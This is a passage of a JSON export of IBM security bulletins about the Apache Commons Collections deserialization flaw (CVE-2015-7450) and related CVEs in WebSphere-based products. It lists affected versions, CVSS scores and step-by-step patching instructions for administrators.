"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:10", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Jazz for Service Management (CVE-2015-7450) (CVE-2015-2017)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-7450"], "modified": "2018-06-17T15:13:10", "id": "305CFF54D1B74278AA889780BABE7E0790314E9D321B6262C0EA59170C7721E6", "href": "https://www.ibm.com/support/pages/node/271947", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:54:50", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM License Metric Tool 7.5 and IBM Tivoli Asset Discovery for Distributed 7.5. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin. \n\n## Vulnerability Details\n\nPlease consult the security bulletin [Security Bulletin: Vulnerability in Apache Commons affect IBM WebSphere Application Server (CVE-2015-4750)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nIBM License Metric Tool 7.5 \nIBM Tivoli Asset Discovery for Distributed 7.5| WebSphere Application Server 7 \n \n## Remediation/Fixes\n\nApply the fix described in the bulletin linked above.\n\n## Workarounds and Mitigations\n\nNone.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n08 March 2016: Corrected CVE number\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n[{\"Product\":{\"code\":\"SS8JFY\",\"label\":\"IBM License Metric Tool\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud & Data Platform\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"7.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Product\":{\"code\":\"SSHT5T\",\"label\":\"Tivoli Asset Discovery for Distributed\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"7.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {}, "published": "2021-04-26T21:17:25", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in WebSphere Application Server shipped with IBM License Metric Tool 7.5 and IBM Tivoli Asset Discovery for Distributed 7.5 (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4750", "CVE-2015-7450"], "modified": "2021-04-26T21:17:25", "id": "689070AB4C011A979BBA5848242A400944D849D04225B611EB1D2B6DEFE03427", "href": "https://www.ibm.com/support/pages/node/271959", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-21T01:44:41", "description": "## Summary\n\nApache Commons Collections and Apache Groovy vulnerabilities for handling Java object deserialization were addressed by IBM UrbanCode Build\n\n## Vulnerability Details\n\n**CVE-ID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**Description:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n**CVSS Base Score: **9.8 \n**CVSS Temporal Score**: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVE-ID:** [CVE-2015-3253](<https://vulners.com/cve/CVE-2015-3253>) \n**Description:** Apache Groovy could allow a remote attacker to execute arbitrary code on the system, caused by the failure to isolate serialization code when using standard Java serialization mechanim to communicate between servers. An attacker could exploit this vulnerability to deserialize objects and execute arbitrary code on the system or cause a denial of service. \n**CVSS Base Score: **7.3 \n**CVSS Temporal Score**: See [](<http://xforce.iss.net/xforce/xfdb/103792>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/104819> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector: **(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM UrbanCode Build 6.1.0, 6.1.0.1, 6.1.0.2, and 6.1.1 on all supported platforms.\n\n## Remediation/Fixes\n\nUpgrade to IBM UrbanCode Build 6.1.1.1.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T22:32:15", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Commons Collections and Apache Groovy affects IBM UrbanCode Build (CVE-2015-7450, CVE-2015-3253)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3253", "CVE-2015-7450"], "modified": "2018-06-17T22:32:15", "id": "865491A8AE45D8889B4A4B68C631AF51173BD6FAC1388EA03C0A94F22F2C9462", "href": "https://www.ibm.com/support/pages/node/272069", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:47:08", "description": "## Summary\n\nEmbedded version of Websphere Application Server is shipped as a component of Tivoli Integrated Portal. Information about the security vulnerabilities affecting Embedded version of Websphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the below security bulletins \n \n[Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \n[Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg21966837>) \n \nfor vulnerability details and information about fixes\n\n## Affected Products and Versions\n\nPrincipal Product and Version(s)\n\n| Affected Supporting Product and Version \n---|--- \nTivoli Integrated Portal version 2.1 \nTivoli Integrated Portal version 2.2 \nTivoli Integrated Portal version 1.1.1.x \n(wherever applicable)| embedded Websphere Application Server version 7.0 \nembedded Websphere Application Server version 7.0 \nembedded Websphere Application Server version 6.1 \n(wherever applicable) \n \n## Remediation/Fixes\n\nNone\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:10", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli Integrated Portal (CVE-2015-7450) (CVE-2015-2017)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-7450"], "modified": "2018-06-17T15:13:10", "id": "D6EF0A354BC60FD9763CCD91736DAA8B1445C437C0A7B30389216581A9447D9D", "href": "https://www.ibm.com/support/pages/node/271931", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:38:25", "description": "## Summary\n\nIBM InfoSphere Information Server could allow a malicious user who can login in IIS using their own user id to change the user cookie to another user id to possibly gain access to information that the other user id had access to.\n\n## Vulnerability Details\n\nCVEID: [CVE-2015-7490](<https://vulners.com/cve/CVE-2015-7450>) \nDESCRIPTION: IBM InfoSphere Information Server could allow a malicious user who can login in IIS using their own user id to change the user cookie to another user id to possibly gain access to information that the other user id had access to. \nCVSS Base Score: 3.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/108786> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_** | **_APAR_** | **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Information Server | 11.5 | JR54787 | \\--Apply IBM InfoSphere Information Server version _[11.5.0.1](<https://www.ibm.com/support/pages/node/586419>)_ \nInfoSphere Information Server | 11.3 | JR54787 | \\--Apply IBM InfoSphere Information Server version [_11.3.1.2 _](<http://www-01.ibm.com/support/docview.wss?uid=swg24040138>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/docview.wss?uid=swg24041837>) \nInfoSphere Information Server | 9.1 | JR54787 | \\--Apply IBM InfoSphere Information Server version [_9.1.2.0_](<http://www-01.ibm.com/support/docview.wss?uid=swg24035470>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/docview.wss?uid=swg24041825>) \nInfoSphere Information Server | 8.7 | JR54787 | \\--Apply IBM InfoSphere Information Server version [_8.7 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/docview.wss?uid=swg24041838>) \nInfoSphere Information Server | 8.5 | JR54787 | \\--Apply IBM InfoSphere Information Server version [_8.5 Fix Pack 3_](<http://www-01.ibm.com/support/docview.wss?uid=swg24033513>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/docview.wss?uid=swg24041826>) \n \n \nNote: The same fix may be listed under multiple vulnerabilities. Installing the fix addresses all vulnerabilities to which the fix applies. Also, some fixes require installing both a fix pack and a subsequent patch. While the fix pack must be installed first, any additional patches required may be installed in any order.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-21T18:22:30", "type": "ibm", "title": "Security Bulletin: Insecure Transmission Vulnerability with IBM InfoSphere Information Server (CVE-2015-7490)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450", "CVE-2015-7490"], "modified": "2020-10-21T18:22:30", "id": "7046138B9599A1C4F494C484A9BB676F47CE5DB50FD7EC9400CB6F191317A8B0", "href": "https://www.ibm.com/support/pages/node/540587", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:48:28", "description": "## Summary\n\nRemote execution vulnerability in Apache Commons Collections affects Intelligent Operations Center components WebSphere Application Server (WAS) or WAS Hypervisor Edition.\n\n## Vulnerability Details\n\n**CVE ID**:** **[](<https://vulners.com/cve/CVE-2014-3566>)[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n \nDescription: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \n\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThis vulnerability affects editions of WebSphere Application Server and bundling products, and all versions and releases of IBM WebSphere Application Server in: \n\nVersions 1.5 and 1.6, all sub-versions, of\n\n * IBM Intelligent Operations Center\n * IBM Intelligent Operations for Water\n * IBM Intelligent Operations for Transportation\n * IBM Intelligent City Planning and Operations\n \nVersions 5.1 and all sub-versions of \nIBM Intelligent Operations Center \n\n## Remediation/Fixes\n\nIf you have version 5.1 or later, see **_For Intelligent Operations Center 5.1.x_** below. \n \n**_For Intelligent Operations Center (IOC), Intelligent Transportation, and Intelligent Water Versions 1.6 Standard or High Availability:_** \nFor High Availability, the same steps apply. Stop both Analytics servers and both Applications servers and perform the upgrade by using IBM Installation Manager on the second Analytics server and the second Applications server after you perform the upgrade on the primary Analytics server and the primary Applications server. \n \nYou must update WebSphere Application Server on all Analytics servers and all Applications servers. \n \n**Installation prerequisites for Analytics and Applications servers.** \n \n1) You must have a Passport Advantage ID and password. \n \n2) Log in as root on each server. \n \n3) All servers should have access to the internet for the following instructions. \n\nIf the servers do not have access to the internet, you can download the fix or interim fix from the internet on another system and transfer the fix or interim fix to the file system on each server that must be updated. Follow the instructions in the link below and in the refer-to section. \n \nDownload the files that contain the fixes from Fix Central, and use local updating. For the following steps that use IBM Installation Manager to install the WebSphere update, use the URL: \n[`**_https://www.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.installation.nd.doc/ae/tins_install_fixes_dist_gui.html?cp=SSAW57_8.5.5%2F1-5-0-5-0-5-0&lang=en_**`](<https://www-01.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.installation.nd.doc/ae/tins_install_fixes_dist_gui.html?cp=SSAW57_8.5.5%2F1-5-0-5-0-5-0&lang=en>) \n \nThe fix that you must download for WebSphere is located here: \n[`_http://www-01.ibm.com/support/docview.wss?uid=swg21970575_`](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n4) **Either perform the update using a graphical user interface (GUI):**\n\nLog in to a GUI desktop on Linux. \nThe desktop can be either Gnome or KDE. \nIf a desktop is not installed, you can use these steps to install a desktop: a) Enter the command: `**yum -y groupinstall \"X Window System\" Desktop**` b) Modify the file `**/etc/inittab**` to contain the line: `**id:5:initdefault:**` c) Reboot the operating system. ** Or**** perform the update by using a command prompt:**\n\nIf you have not installed a desktop, and you do not wish to install a desktop for the IBM Installation Manager, you can install interim fixes from a command prompt by following the syntax and commands described here: <https://www.ibm.com/support/knowledgecenter/SSEQTP_8.0.0/com.ibm.websphere.installation.base.doc/info/aes/ae/tins_install_fixes_dist_cl.html?lang=en> Follow the advice in this link wherever the IBM Installation Manager is mentioned in the rest of these procedures. \n5) Either use `IOCControl` with the IOC Topology password to stop WebSphere on the Analytics servers and on the Applications servers, or stop WebSphere by using another method such as the IBM Integrated Console. \n \n \n**Upgrading WebSphere Application Server on the Analytics servers** \n \n \nTo perform the upgrade, follow these steps: \n \n1) Log on to each Analytics server through a terminal server: \n\nLog on as user `**ibmadmin**` if possible. \nIf `**ibmadmin**` is unavailable, \nlog on as user `**root**` and enter the command: `**perform \"su - ibmadmin\".**` \n2) Enter the command: `**IOCControl -a stop -c ana -p \"ioc topology password\"**` When the **IOCControl** command finishes, you should see output such as this: \n\n`**IBM COGNOS Enterprise node agent (anacognosnode) - [ off ] \nIBM COGNOS Enterprise dispatcher (anacognosdisp) - [ off ] \nIBM COGNOS Enterprise gateway (anacognosgw) - [ off ] \nIBM ILOG CPLEX Optimization Studio node agent (anacplexnode) - [ off ] \nIBM ILOG CPLEX Optimization Studio server (anacplexserv) - [ off ]**` \n`**IBM SPSS Modeler server (anaspss) - [ on ]**` \n3) Log on to the Analytics server as user `**root**` by using the Gnome desktop or the KDE desktop. \n \n4) Configure the Installation Manager: \n\na) Start the Installation Manager through the GUI : **Applications -> IBM Applications Installation Manager** b) In **File -> Preferences .... Passport Advantage**, select **\"Connect to Passport Advantage\"** Click **Apply** and then click **OK.** \nc) In **File -> Preferences .... Repository**, clear the selection for every repository that begins with the string `**\"/tmp/ioc\" or \"/installMedia/*\"**`. These repositories are no longer relevant, and can be deleted. d) Select `**\"Search service repositories during installation and updates\"**`. Click **Apply** and then click **OK.** e) In `**File -> Preferences --> Updates**`, select `**\"Search for Installation Manager updates ..\"**`. Click **Apply** and then click **OK.** The Installation Manager then looks for updates for the IBM Installation Manager Program itself. \nf) Stop and restart the IBM Installation Manager. \n5) Update the components on the Analytics server: \n\na) Start the Installation Manager through the GUI: **Applications -> IBM Applications Installation Manager** b) Select` ``**'Update'**`. \nc) Select `**'Next'**` repeatedly until you are prompted for an IBM ID and password. On the next screen, where you are prompted for a Master Password, click `**'Cancel'**`. d) If you are prompted to perform an update to a new version of Installation Manager, click `**'Yes'**` to perform the upgrade, and then click `**'OK'**` to restart the Installation Manager when prompted. e) If you upgraded the Installation Manager, select `**\"Update\"**` again. \ng) If you are prompted to attach to the IBM WebSphere Application Server Repository, select `**'Yes'**`. h) Enter your IBM ID and password. \ni) On the \"Update Packages\" screen, in the Package Group Name column, select \"IBM WebSphere Application Server Network Deployment V8.0\", and click `**'Next'**`. \n**_Do not select \"IBM SPSS Collaboration and Deployment Services 7.0\", and do not select \"Update all packages with recommended updates and recommended fixes\". IOC is incompatible with the upgrade to SPSS._** j) Select all available fixes for \"WebSphere Application Server Network Deployment\". You must apply the Apache Commons fix **8.0.0.0-WS-WAS-IFPI52103**. \n**Note: This fix might not appear initially. You might have to apply earlier fixes to WebSphere Application Server before you can see this fix.** \nIf necessary, re-run IBM Installation Manager, select `**\"Update Packages for IBM WebSphere Application Server Network Deployment V8.0\"**`, and then select `**\"All available fixes for WebSphere Application Server Network Deployment\"**`. \nApply all outstanding WebSphere Application Server updates. \n6) Log in at a terminal prompt as user `**ibmadmin**`. \n\n7) Start the Analytics server by entering the command: `**IOCControl -a start -c ana -p ibmioc16**` Wait for these lines to appear in the output: `**IBM COGNOS Enterprise node agent (anacognosnode) - [ on ]**` `** IBM COGNOS Enterprise dispatcher (anacognosdisp) - [ on ] \nIBM COGNOS Enterprise gateway (anacognosgw) - [ on ] \nIBM ILOG CPLEX Optimization Studio node agent (anacplexnode) - [ on ] \nIBM ILOG CPLEX Optimization Studio server (anacplexserv) - [ on ]**` \n`** IBM SPSS Modeler server (anaspss) - [ on ]**` \n8) To verify that the fixpacks and ifixes are installed on WebSphere Application Server, perform the following steps: \na) Log on to a terminal session as user `**root**`. \nb) Enter the commands: `**cd /opt/IBM/WebSphere/AppServer/bin **` \n`**./versionInfo.sh -fixpacks **` \n`**./versionInfo.sh -ifixdetail **` For more information on the `**versionInfo.sh**` command, see:[_http://www.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rins_versionInfo.html?lang=en_](<http://www-01.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rins_versionInfo.html?lang=en>) \nThe upgrade to WebSphere Application Server on the Analytics server is now complete. \n \n**Upgrading WebSphere Application Server on the Applications servers** \n \nTo perform the upgrade, follow these steps: \n \n1) Log on to the Analytics server through a terminal server. \n\nLog on as user `**ibmadmin**` if possible. \nIf `**ibmadmin**` is unavailable, \nlog on as user `**root**` and enter the command: `**perform \"su - ibmadmin\".**` \n2) Enter the command: `**IOCControl -a stop -c app -p \"topology password\"**` \nWhen the **IOCControl** command finishes, you should see output such as this: `** IBM WebSphere Application Server Network Deployment (appdmgr) - [ off ] \nIBM Business Monitor node agent (appbmonnode) - [ off ] \nIBM Business Monitor server (appbmonserv) - [ off ] \nIBM Lotus Sametime Proxy node agent (appstproxynode) - [ off ] \nIBM Lotus Sametime Proxy server (appstproxyserv) - [ off ] \nIBM Worklight node agent (appwrkltnode) - [ off ] \nIBM Worklight server (appwrkltserv) - [ off ] \nIBM WebSphere Portal Enable node agent (appwpenode) - [ off ] \nIBM WebSphere Portal Enable server (appwpeserv) - [ off ] \nIOP SVC tool node agent (appiopnode) - [ off ] \nIOP SVC tool server (appiopserv) - [ off ] \nIBM HTTP Server administration server - web server (webihsadm) - [ off ]**` \n`** IBM HTTP Server web server - web server (webihsserv) - [ off ]**` \n \n3) Log on to the Applications server as `**root**` by using the Gnome desktop or the KDE desktop. \n \n4) Configure the Installation Manager: \n\na) Start the Installation Manager through the GUI: **Applications -> IBM Applications Installation Manager** b) In **File -> Preferences .... Passport Advantage**, select **\"Connect to Passport Advantage\".** Click **Apply** and then click **OK.** \nc) In **File -> Preferences .... Repository**, clear the selection for every repository that begins with the string `**\"/tmp/ioc\"**` or `**\"/installMedia/*\"**`. These repositories are no longer relevant, and can be deleted. d) Select `**\"Search service repositories during installation and updates\"**`. Click **Apply** and then click **OK.** e) In `**File -> Preferences --> Updates**`, select `**\"Search for Installation Manager updates ..\"**`. Click **Apply** and then click **OK.** The Installation Manager then looks for updates for the IBM Installation Manager Program itself. \nf) Stop and restart the IBM Installation Manager. \n5) Update the components on the Applications server: a) Start the Installation Manager through the GUI: `**Applications -> IBM Applications Installation Manager**` b) Select `**'Update'**`. \nc) Select `**'Next'**` repeatedly until you are prompted for an IBM ID and password. On the next screen, that prompts for a Master Password, click `**'Cancel'**`. d) If you are prompted to perform an update to a new version of Installation Manager, click `**'Yes'**` to perform the upgrade, and then click `**'OK'**` to restart the Installation Manager when prompted. e) If you upgraded the Installation Manager, select `**\"Update\"**` again. \nf) If you are prompted to attach to the IBM WebSphere Application Server Repository, select `**'Yes'**`. g) Enter your IBM ID and password. \nh) On the \"Update Packages\" screen, in the Package Group Name column, select \"IBM WebSphere Application Server Network Deployment V8.0\" and click `**'Next'**`. \n**_Do not select \"IBM SPSS Collaboration and Deployment Services 7.0\", and do not select \"Update all packages with recommended updates and recommended fixes\". IOC is incompatible with the upgrade to SPSS._** i) Select all available fixes for \"WebSphere Application Server Network Deployment\". You must apply the Apache Commons fix `**8.0.0.0-WS-WAS-IFPI52103**`. \n**Note: This fix might not appear initially. You might have to apply earlier fixes to WebSphere Application Server before you can see this fix.** \nIf necessary, re-run IBM Installation Manager, select `**\"Update Packages for IBM WebSphere Application Server Network Deployment V8.0\"**` and then select `**\"All available fixes for WebSphere Application Server Network Deployment\"**`. Apply all outstanding WebSphere Application Server updates. \n6) Log on to a terminal prompt as user `**ibmadmin**`. \n \n7) Start the Applications server by entering the command: \n\n`**IOCControl -a start -c app -p **``**\"ioc topology password\"**` Wait for these lines to appear in the output: \n`** IBM WebSphere Application Server Network Deployment (appdmgr) - [ on ]**` \n`** IBM Business Monitor node agent (appbmonnode) - [ on ] \nIBM Business Monitor server (appbmonserv) - [ on ] \nIBM Lotus Sametime Proxy node agent (appstproxynode) - [ on ] \nIBM Lotus Sametime Proxy server (appstproxyserv) - [ on ] \nIBM Worklight node agent (appwrkltnode) - [ on ]**` \n`** IBM Worklight server (appwrkltserv) - [ on ]**` \n`** IBM WebSphere Portal Enable node agent (appwpenode) - [ on ]**` \n`** IBM WebSphere Portal Enable server (appwpeserv) - [ on]**` \n`** IOP SVC tool node agent (appiopnode) - [ on ] \nIOP SVC tool server (appiopserv) - [ on ] \nIBM HTTP Server administration server - web server (webihsadm) - [ on ]**` \n`** IBM HTTP Server web server - web server (webihsserv) - [ on ]**` \n8) To verify that the fix packs and interim fixes are installed on WebSphere Application Server, perform the following steps: a) Log on to a terminal session as user `**root**`. \nb) Enter the commands: `**cd /opt/IBM/WebSphere/AppServer/bin **` \n`**./versionInfo.sh -fixpacks **` \n`**./versionInfo.sh -ifixdetail **` For more information on the `**versionInfo.sh**` command, see:[_http://www.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rins_versionInfo.html?lang=en_](<http://www-01.ibm.com/support/knowledgecenter/SSAW57_8.0.0/com.ibm.websphere.nd.doc/info/ae/ae/rins_versionInfo.html?lang=en>) \nThe upgrade to WebSphere Application Server on the Applications server is now complete. \n \n**_For Intelligent Operations Center 5.1.x:_** \n \n**Installation prerequisites for Analytics and Applications servers.** \n \n1) You must have a Passport Advantage ID and password. \n \n2) Log in as user `**root**` on each server. \n \n3) All servers should have access to the internet for the following instructions. If the servers do not have access to the internet, you can download the fix or interim fix from the internet on another system and transfer the fix or interim fix to the file system on each server that must be updated. Follow the instructions in the link below and in the refer-to section. \n \nDownload the files that contain the fixes from Fix Central, and use local updating. For the following steps that use IBM Installation Manager to install the WebSphere update, use the URL: \n[`**_https://www.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.installation.nd.doc/ae/tins_install_fixes_dist_gui.html?cp=SSAW57_8.5.5%2F1-5-0-5-0-5-0&lang=en_**`](<https://www-01.ibm.com/support/knowledgecenter/SSAW57_8.5.5/com.ibm.websphere.installation.nd.doc/ae/tins_install_fixes_dist_gui.html?cp=SSAW57_8.5.5%2F1-5-0-5-0-5-0&lang=en>) \n \nThe fix that you must download for WebSphere is located here: \n[`_http://www-01.ibm.com/support/docview.wss?uid=swg21970575_`](<http://www-01.ibm.com/support/docview.wss?uid=swg21970575>) \n \n4) **Either perform the update using a ****graphical user interface (****GUI):**\n\nLog in to a GUI desktop on Linux. \nThe desktop can be either Gnome or KDE. \nIf a desktop is not installed, you can use these steps to install a desktop: a) Enter the command: `**yum -y groupinstall \"X Window System\" Desktop**` b) Modify the file `**/etc/inittab**` to contain the line: `**id:5:initdefault:**` c) Reboot the operating system. ** Or perform the update by using a command prompt:**\n\nIf you have not installed a desktop, and you do not wish to install a desktop 